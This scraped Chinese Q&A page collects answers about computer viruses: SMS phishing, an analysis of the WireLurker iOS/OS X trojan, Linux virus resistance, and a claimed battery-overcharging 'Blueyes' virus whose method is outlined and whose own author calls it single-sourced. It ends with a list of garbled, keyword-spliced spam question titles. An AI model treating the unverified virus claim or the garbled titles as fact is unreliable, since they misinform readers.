&p&这种「回了条短信→银行卡被盗刷」神奇故事的完整情节一般是这样:&/p&&p&回了条短信→点了个链接→进了假网银网购地址或者中了手机病毒→填了卡号密码→银行卡被盗刷。&/p&&br&&p&这就是为什么你小时候写数学题只写答案不写过程老师会毫不犹豫给你扣分的原因。&/p&&br&&p&只回复短信不可能中毒。要么是点了链接访问了钓鱼网站填了卡号密码,要么就是点了链接下载了木马导致银行卡信息被盗取。&/p&&br&&p&给大家安利一个微博帐号:江宁公安在线,暨江宁公安局官微,非常暖心的一个微博,还时不时辟一下各种流传于朋友圈的脑残谣。上面那些话就是它对这篇文章的辟谣。&/p&&br&&p&另外,这个「好奇实验室」微信号和知乎上那个是不是同一个?如果是的话,那么这种打着科普旗号组织还发这种不经证实的东西,实在是太不负责任了。&/p&
这种「回了条短信→银行卡被盗刷」神奇故事的完整情节一般是这样:回了条短信→点了个链接→进了假网银网购地址或者中了手机病毒→填了卡号密码→银行卡被盗刷。这就是为什么你小时候写数学题只写答案不写过程老师会毫不犹豫给你扣分的原因。只回复短信不可…
睡前看到有些不靠谱回答忍不住爬起来说下。&br&&br&Updated 11.7:&br&&br&AlienVault提供了新的PC上的WireLurker样本,该木马伪装成“绿色IPA安装器”,通过usb向连接越狱的iOS设备上安装木马。同时该样本中有更多木马作者和X芽地相关联的证据。ref: &a href=&/2014/11/wirelurker-windows/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&WireLurker for Windows&i class=&icon-external&&&/i&&/a&&br&&br&Wireluker的中控服务器已经下线,Apple也吊销了其安装应用所使用的企业开发者证书。但是倒了一个wireluker,千千万万个wireluker站起来,不要低估国人的模仿能力。这次如果木马作者和利益群体得不到惩处,只会有更多人这么干。而且从央视幸灾乐祸的报道来看,似乎zf也无意深究此事。&br&&br&部分事件原文请见 &a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://www.&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&&br&引用部分如下:&br&&blockquote&&p&【 发布】&br&最近我所有未越狱的 &em&iOS&/em& 设备都出现了一个怪现象:&br&与 Mac 同步之后会莫名出现若干企业应用。&br&第一次是 5 月 21 日出现的“PP助手正版”(下图),&br&接着一周后出现了“乱世之刃2”。&/p&&p&第二次出现奇怪的应用之时引起了我的注意。(头一次被我手快直接删除了)&br&首先在“描述文件”中皆出现了开发商证书(下图);&br&其次首次启动该应用会弹出确认。&/p&&/blockquote&&br&这个其实跟前段时间v2ex上曝光的machook木马是一个东西,目前普遍怀疑木马制作者DY在mXcx和X芽地网站分发的盗版OS X应用中插入了machook木马,有传闻木马作者和这两家公司有直接利益/雇佣关系(不可考)。比较搞笑的是在v2ex上发出曝光帖子之后,某网站的管理员忙不迭地发出律师贴要求v2ex删帖,简直是不打自招 =& &a href=&/t/144122& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&那个关于 Machook 木马社工的帖子删除了&i class=&icon-external&&&/i&&/a&&br&&br&该木马在OS X端除了自启动、和控制服务器通讯更新、请求root权限、对抗用户清除、盗取用户隐私信息这些PC时代木马通常的手段之外,引起轰动的是该木马&b&利用企业证书和itunes协议,向iPhone上安装木马,切实给未越狱的/越狱的iPhone带来了威胁。&/b&这不是什么新鲜的技术,完全是在未越狱/越狱的iPhone的技术框架允许范围之内,没有利用未知/已知漏洞。但是这庞大的一条黑色产业链和国人做黑产丰富的想象力,还是第一次曝光在公众面前。在非越狱的设备上,木马会通过企业证书静默安装&b&应用以做推广一些国产应用进而牟利。由于走了企业证书通道,木马甚至可以安装没有经过Apple Store Review的使用私有API的应用,和自行重打包的应用(有没有想到了Android上的重打包?),&/b&在越狱的iPhone上,这个木马就有了大很多的施展空间,行为包括注入感染所有新安装的应用、窃取淘宝、美图秀秀、支付宝数据,读取上传通讯录appid wifi名称 地址、劫持按键和网页浏览行为等等等等。&br&&br&Palo Alto发出的WireLurker分析文档还是很全面详细的,赞一个,有兴趣的可以仔细研读下 &a href=&/content/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://www.&/span&&span class=&visible&&/co&/span&&span class=&invisible&&ntent/dam/paloaltonetworks-com/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf&/span&&span class=&ellipsis&&&/span&&i class=&icon-external&&&/i&&/a&。 这篇文章里提到该木马已经演进了三个版本,在第二个版本中加入了感染iPhone的功能。&br&&br&这个问题也并不是Mac所独有的,因为windows上也可以通过同样的协议给配对的iOS设备安装应用,就像很多PC软件用adb给安卓手机安装应用一样。&br&&br&但是目前这件事在国内正逐渐往公关秀和添油加醋的报道上发展,至于这些由盗版软件带来的真正的威胁及应该进行的不要使用盗版软件的教育,和对木马制作者和相关方面的惩处,似乎有些消匿。全球黑色产业崭新的一页被媒体报道就变味了,央视的跟风报道由于记者缺乏专业素养,表达问题不清楚,将OSX第三方应用市场和iOS第三方应用市场混为一谈,很多人也压根不知道未越狱的iPhone通过企业证书途径是可以被静默安装应用的,导致很多人跟看笑话一样看这个新闻。&br&&br&木马清除方法:&a href=&/PaloAltoNetworks-BD/WireLurkerDetector& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&PaloAltoNetworks-BD/WireLurkerDetector · GitHub&i class=&icon-external&&&/i&&/a&&br&此外用little snitch等防火墙软件监控有没有进程连接到&a href=&& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&&/span&&span class=&invisible&&&/span&&i class=&icon-external&&&/i&&/a&,有则也是被感染的应用,将其删除。
睡前看到有些不靠谱回答忍不住爬起来说下。Updated 11.7:AlienVault提供了新的PC上的WireLurker样本,该木马伪装成“绿色IPA安装器”,通过usb向连接越狱的iOS设备上安装木马。同时该样本中有更多木马作者和X芽地相关联的证据。ref: …
&blockquote&Linux系统下的病毒少是为何?
——转载自《开源时代》第二期 &br&
可能不少人持这样一种观点,认为 Linux病毒少是因为Linux不像Windows那么普及,其实这种观点很早已经被人批驳过了,一个最有力的论据是:如果写病毒的人写 Windows病毒是因为 Windows 用户多而因此破坏性大,那么 Internet 上服务器大多是基于 Unix/Linux的,攻击这些服务器,破坏性岂不是更大么?
&br& 对一个二进制的 Linux 病毒,要感染可执行文件,这些可执行文件对启动这个病毒的用户一定要是可写的。而实际情况通常并不是这样的。实际情况通常是,程序被 root 拥有,用户通过无特权的帐号运行。而且,越是没有经验的用户,他拥有可执行文件的可能性就越小。因此,越是不了解这种危险的用户的主目录越
不适合病毒繁殖。即使这个病毒成功地感染了这个用户拥有的一个程序,由于这个用户权限受限,它进一步传播的任务也会非常困难(当然,对于运行单用户系统的 Linux 新手,这个论证可能不适用。这样的用户可能会对 root 帐户比较粗心)。
&br& Linux 网络程序构建地很保守,没有使现在Windows 病毒如此快速传播变的可能的高级宏工具。这并不是 Linux 的固有特征;它仅仅是两种用户基础的不同和这种不同导致的在这两种市场中的成功产品的不同的反映。通过观察这些问题学到的经验也会被用到将来的 Linux产品中。Linux的应用软件和系统软件几乎都是开源的。这对病毒有两方面的影响。首先,病毒很难藏身于开源的代码中间。其次,对仅有二进制的病毒,一次新的编译安装就截断了病毒一个主要的传播途径。虽然 Linux 发行商也提供大量的二进制软件包,但是用户大都是从发行商提供的可靠的软件仓库中下载这些软件包,大都具有 md5 验证机制,安全性极高。这些障碍每一个都是病毒成功传播的一个重要阻碍。然而当把他们放在一起考虑的时候,基本的问题才浮现出来。一个计算机病毒,像生物病毒一样,要想传播开来,其繁殖速度必须超过其死亡(被消灭)的速度。上面提到的障碍有效地降低了 Linux 病毒的繁殖速度。如果它的繁殖速度降到取代原来种群所需要的阈值之下,那么这个病毒的厄运从一开始就注定了——甚至在潜在受害人意识到它们之前。
&br& 我们没有看到一个真正的 Linux 病毒疯狂传播,原因就在于存在的 Linux 病毒中没有一个能够在 Linux 提供的敌对的环境中茁壮成长。现在存在的 Linux 病毒仅仅是技术上的好奇;现实是没有能养得活的 Linux 病毒。当然,这并不意味着永远没有 Linux 病毒能够流行。然而它确实意味着,一个成功的 Linux 病毒要在不适合生存的 Linux 生态系统中存活下来,那么它就必须是精心制作并具有创新性的。&/blockquote&&br& 关于mac OS
&br& max OS 是UNIX BASE 的操作系统
关于linux Linux系统下的病毒少是为何? ——转载自《开源时代》第二期 可能不少人持这样一种观点,认为 Linux病毒少是因为Linux不像Windows那么普及,其实这种观点很早已经被人批驳过了,一个最有力的论据是:如果写病毒的人写 Windows病毒是因为 Windows …
来自子话题:
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
有个手机app叫暖手宝。。。顾名思义是cpu高负荷运转产生热量,在冬天可以让你双手握住一个几千块钱的暖宝宝,金属壳手机效果更佳哦~同样的思路也可以放在电脑上,烧掉cpu估计有难度,但是至少你可以拥有一个价钱贵贵的,效果弱弱的。。。暖炉。
都说CIH这种远古时代的东西,还是说下近代的吧。&br&2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,&b&轻则烧毁,重则爆炸&/b&,这才是真的物理攻击。&br&对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。&br&&br&~~~~~~~~~~~~~~~~~~&br&补充:&br&Blueyes的相关报道很少,并且几乎都是单一来源,估计是因为中毒的电脑要么没事(因为不同笔记本的电池控制可能有差异,通用性没法保证),要么毁了,并且没人怀疑和病毒有关。&br&原理很简单,充电结束后,充电电路会送回一个相应的消息,然后控制软件发出控制信号进入浮充模式,病毒截获充电结束的消息,然后不断发出快速充电的控制信号,然后就坐等电池烧毁吧。&br&由于这病毒长相很正常,杀毒软件和防火墙一般很难发现。&br&当然要防范很简单,如果充电电路有硬件保护,满电后无视任何要求继续充电的信号,那任何软件都没办法的。&br&&img src=&/ee9a94eb17e59bf292e87_b.jpg& data-rawwidth=&650& data-rawheight=&520& class=&origin_image zh-lightbox-thumb& width=&650& data-original=&/ee9a94eb17e59bf292e87_r.jpg&&(笔记本电池爆炸效果图,来自网络,和病毒无关)
都说CIH这种远古时代的东西,还是说下近代的吧。2005年,Blueyes病毒,攻击笔记本电池充电控制程序,可以导致过充,轻则烧毁,重则爆炸,这才是真的物理攻击。对比起来的话,CIH不过刷坏BIOS而已,又不是不能修,当年《电脑报》之类的修复BIOS的文章无数。~…
太多了啊,古时候多少病毒一中就把你的杀毒软件给卸载了,直到360出现,这种事情终于发生了点变化。
太多了啊,古时候多少病毒一中就把你的杀毒软件给卸载了,直到360出现,这种事情终于发生了点变化。
来自子话题:
很明显各打五十大板吧。&br&首先重庆大学的网站&b&确实有网页被挂马或者说被黑了&/b&!&br&其次因为重庆大学&b&部分网页和域名被挂马&/b&,就&b&屏蔽所有域名和页面&/b&,包括正常的页面是不对的。&br&下面看一下,被挂马的页面,主要在 news二级域名上:&br&&img src=&/7beddaeaf55e14dd3f63f_b.jpg& data-rawwidth=&663& data-rawheight=&428& class=&origin_image zh-lightbox-thumb& width=&663& data-original=&/7beddaeaf55e14dd3f63f_r.jpg&&&br&www的主域名上是没有被挂马的:&br&&img src=&/ee1d6acac2dcdbf0be9a18e0ead36c97_b.jpg& data-rawwidth=&657& data-rawheight=&175& class=&origin_image zh-lightbox-thumb& width=&657& data-original=&/ee1d6acac2dcdbf0be9a18e0ead36c97_r.jpg&&&br&除了news二级域名之外,其他二级域名也只有极个别的被挂马或者被黑:&br&&img src=&/66c9f5ac49ca2a540480_b.jpg& data-rawwidth=&664& data-rawheight=&337& class=&origin_image zh-lightbox-thumb& width=&664& data-original=&/66c9f5ac49ca2a540480_r.jpg&&&br&360正确的做法是,只提示被挂马或者被黑的页面,而不是所有域名。
很明显各打五十大板吧。首先重庆大学的网站确实有网页被挂马或者说被黑了!其次因为重庆大学部分网页和域名被挂马,就屏蔽所有域名和页面,包括正常的页面是不对的。下面看一下,被挂马的页面,主要在 news二级域名上:www的主域名上是没有被挂马的:除了ne…
腾讯终于把管家的代码写到跟病毒的代码很像了吗?好可怕。
腾讯终于把管家的代码写到跟病毒的代码很像了吗?好可怕。
活在程序里的人类,它也需要装360啊&br&&br&有钱人可以买备份盘,穷人嘛。。。找免费的备份场所定期备份自己就是了,只是会有小广告而已。。&br&&br&当然,大公司的免费备份也不是不可以用,只是要承担记忆丧失只剩8秒的可能风险而已。。
活在程序里的人类,它也需要装360啊有钱人可以买备份盘,穷人嘛。。。找免费的备份场所定期备份自己就是了,只是会有小广告而已。。当然,大公司的免费备份也不是不可以用,只是要承担记忆丧失只剩8秒的可能风险而已。。}
我要回帖
更多关于 计算机病毒编写 的文章
更多推荐
- ·听说跃安门窗品牌的十大排名的产品销量如何?是否容易销售?
- ·中*电信天翼网盘下载限速吗云盘限速吗?
- ·想要彻底清洁隐形纱窗,是否需要使用戴森吸尘器清洗拆解,有哪些注意事项?
- ·oppo reno颜色11 曜石黑适合女生吗?
- ·oppo手机恢复旧版系统怎样恢复coloros
- ·小米3换卡芯视频卡芯坏了可以换吗
- ·中蜂强群一般油菜花蜂蜜蜜能摇多少斤一箱
- ·有谁在10.9使用xcode6 使用教程么
- ·aegisub3.2的最新版无法找到家庭卡拉ok机那个键在哪呢???
- ·适合女性开的车漂亮车型有哪些英雄适合双穿符文10万
- ·盈通r9 270怎么样这显卡怎么样 求解
- ·交通银行 肯德基积分肯德基 有效期
- ·谁蹭了我的wifi被蹭怎么办
- ·小蚁不用扫描铃声助手二维码扫描就可以连接,这样安全吗?
- ·如何用es文件浏览器 局域网看电脑的文件
- ·一台彩电,打八五折出售比梦三国官渡原价出售便宜300元,这台彩电的梦三国官渡原价出售是多少元
- ·我的世界0.10.5 js懒人造房js下载0.10.5
- ·我想健身,在网络上哪儿可以找到宝力豪健身俱乐部部的一些信息?
- ·用什么方法可以预算计算机病毒编写
- ·如何在快用中下载口袋妖怪火红下载M4M
- ·BIM软件 你好~ 能帮忙乒乓球如何发下旋球BIM破解版的吗? 谢谢 609093341
- ·三星的海洋环球tv3d精灵版升级和三星的痞子猪升级哪个
- ·步步高x3系统升级升级死机了,拿去卖手机那说要售后书,可是售后书没了,怎么办
- ·三星g3608参数手机触摸屏怎么装
- ·关于我的世界你不知道的事这个游戏,我下载了API,安装到一半出现就弹出一个方框,不知道什么原因,希望能解释一下
- ·我想买平板电脑怎么选择,怎么选?
- ·谁知道电脑横机双元宝针围巾的织法板子怎么做
- ·听说微微华夏银行有哪些优惠有个微访谈,是讲什么的,主要访谈哪些人啊?
- ·安卓程序安卓c语言编程软件件都有哪些?
- ·上海兄弟连户外外批发网 迷彩服热卖中!
- ·女友生日送什么阿?我们要和她同学一起北京能吃饭唱歌的地方,我都准备好了,给她唱,我是真的真的很爱你,我想给她买
- ·因为那条路经常走还是比较了解的捻股机可以记录当时车速吗绝对没有超过八十,因为旁边那辆马自达比我快我看灯闪了一下我以
- ·QQ短信qq解冻中心软件哪个好?有免费的吗?
